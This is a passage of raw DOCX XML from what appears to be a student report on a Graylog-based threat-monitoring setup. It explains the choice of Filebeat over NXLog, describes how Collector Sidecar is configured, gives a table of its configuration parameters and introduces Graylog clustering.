      <w:r w:rsidR="00A8226C">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t xml:space="preserve"> between them</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t xml:space="preserve"> that make us choose Filebeat instead of NXLog are the programing language they use to code and deploy their agent, and Filebeat is developed by Elastic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8226C" w:rsidRDefault="00A8226C" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First, about the programming language, since we want to deploy a little server that handle hundreds of threat monitor agents in the network, we would like to choose a log agent which run as smooth as possible to deploy in that server. In this case, Filebeat is written in </w:t>
      </w:r>
      <w:r w:rsidR="00215BF8">
        <w:t xml:space="preserve">Beats platform which uses Golang as its mainly developing language while NXLog use C for developing its agent. Golang is a flexible, lightweight and powerful when handling multiple threads, which helps us greatly in managing hundreds of agents deployed in the network. We believe, from the practice that Golang run smoother and handling threads better than C without using too much system resources, Filebeat could be deployed and it can handle multiple concurrent tasks without consuming too much resource on our system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215BF8" w:rsidRDefault="00215BF8" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>The second reason for choosing Filebeat is that Filebeat are developed by Elastic, which is the company develops the Elasticsearch Graylog server is using for its operations in managing and searching log data. Therefore, Filebeat is built in to Graylog Collector Sidecare and our client d</w:t>
      </w:r>
      <w:r w:rsidR="003371FE">
        <w:t xml:space="preserve">o not need to install </w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="003371FE">
        <w:t xml:space="preserve">any third </w:t>
      </w:r>
      <w:r>
        <w:t>party software</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> while they want to protect their system. And for other</w:t>
      </w:r>
      <w:r w:rsidR="00845030">
        <w:t xml:space="preserve"> small</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reason, we believe that just like Microsoft Office works perfectly in Microsoft Windows, Filebeat might works perfectly with Graylog system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD628B" w:rsidRDefault="00845030" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar does not receive any configuration for which log files or directories for log collecting, but that configuration, and following by other configs that help, will be sent</w:t>
      </w:r>
      <w:r w:rsidR="003371FE">
        <w:t xml:space="preserve"> to the agent by Graylog server through Rest API. When recognizes there is any change to the log files specified, Graylog Collector Sidecar read the addon information by reading line to line, then sends that data to the Graylog server. Server process that data, then stores to its database for managing in the future.</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t xml:space="preserve"> Filebeat has a configuration file that store configures for connecting to the Graylog server.</w:t>
      </w:r>
      <w:r w:rsidR="003371FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD628B" w:rsidRDefault="00DD628B" w:rsidP="00EA77C6">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A Graylog Collector Sidecard configuration file might have the c</w:t>
      </w:r>
      <w:r w:rsidR="00EA77C6">
        <w:t xml:space="preserve">ontent show in </w:t>
      </w:r>
      <w:r>
        <w:t>the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD628B" w:rsidRDefault="00DD628B" w:rsidP="00DD628B">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09032B18" wp14:editId="3E421DAD">
            <wp:extent cx="5581650" cy="3032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1650" cy="3032125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA77C6" w:rsidRDefault="00DD628B" w:rsidP="00EA77C6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc483834785"/>
      <w:bookmarkStart w:id="58" w:name="_Toc484886349"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA77C6">
        <w:t>Example configuration of Graylog Collector Sidecar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00EA77C6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00C00948">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/collector_sidecar.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA77C6" w:rsidRDefault="00DD628B" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>The format of configuration file is so simple. A config contains of 2 part</w:t>
      </w:r>
      <w:r w:rsidR="00CF077E">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a parameter and its argument, they are separated by a </w:t>
      </w:r>
      <w:r w:rsidR="00EA77C6">
        <w:t>colon (“:”). The parameters those define the configurations can be explained in the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="6517"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00CF077E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRPr="00CF077E" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRPr="00CF077E" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA77C6">
              <w:t>server_url</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00CF077E">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>URL to the Graylog API, e.g. http://127.0.0.1:9000/api/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA77C6">
              <w:t>update_interval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>The interval in seconds the sidecar will fetch new configurations from the Graylog server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA77C6">
              <w:t>tls_skip_verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Ignore errors when the REST API was started with a self-signed certificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA77C6">
              <w:t>send_status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Send the status of each backend back to Graylog and display it on the status page for the host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>list_log_files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Send a directory listing to Graylog and display it on the host status page, e.g. /var/log. This can also be a list of directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>node_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Name of the Sidecar instance, will also show up in the web interface. Hostname will be used if not set.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>collector_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Unique ID (UUID) of the instance. This can be a string or a path to an ID file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:lastRenderedPageBreak/>
              <w:t>log_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>A path to a directory where the Sidecar can store the output of each running collector backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>log_rotation_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Rotate the stdout and stderr logs of each collector after X seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>log_max_age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Delete rotated log files older than Y seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>List of configuration tags. All configurations on the server side that match the tag list will be fetched and merged by this instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>backends</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00F95A3B">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>A list of collector backends the user wants to run on the target host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F95A3B" w:rsidRPr="00F95A3B" w:rsidRDefault="00F95A3B" w:rsidP="00F95A3B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc484886365"/>
      <w:r w:rsidRPr="00F95A3B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F95A3B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog Collector Sidecar configuration parameters and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="00F95A3B" w:rsidRDefault="00F95A3B" w:rsidP="00F95A3B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F95A3B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00F95A3B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/collector_sidecar.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C5A92" w:rsidRDefault="007C5A92">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033426A" w:rsidRDefault="003371FE" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Graylog server can function individually, or can be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> together</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by configuring them to work in cluster environments. In cluster mode, Graylog servers </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect together</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by using the operation of Rest API</w:t>
      </w:r>
      <w:r w:rsidR="0033426A">
        <w:t>, each server now becomes a node, and those nodes share information together. Each node own</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0033426A">
        <w:t xml:space="preserve"> its MongoDB separately, but Elasticsearch servers now cluster together, and many Graylog servers can query their log simultaneously on one Elasticsearch server, or many Elasticsearch server at the same time. The figure below explains that theory in a graphical way.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033426A" w:rsidRDefault="0033426A" w:rsidP="0033426A">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E80265E" wp14:editId="7543C5FB">
            <wp:extent cx="5581650" cy="39363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1650" cy="3936365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033426A" w:rsidRPr="004E0912" w:rsidRDefault="0033426A" w:rsidP="0033426A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc483834786"/>
      <w:bookmarkStart w:id="61" w:name="_Toc484886350"/>
      <w:r w:rsidRPr="004E0912">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
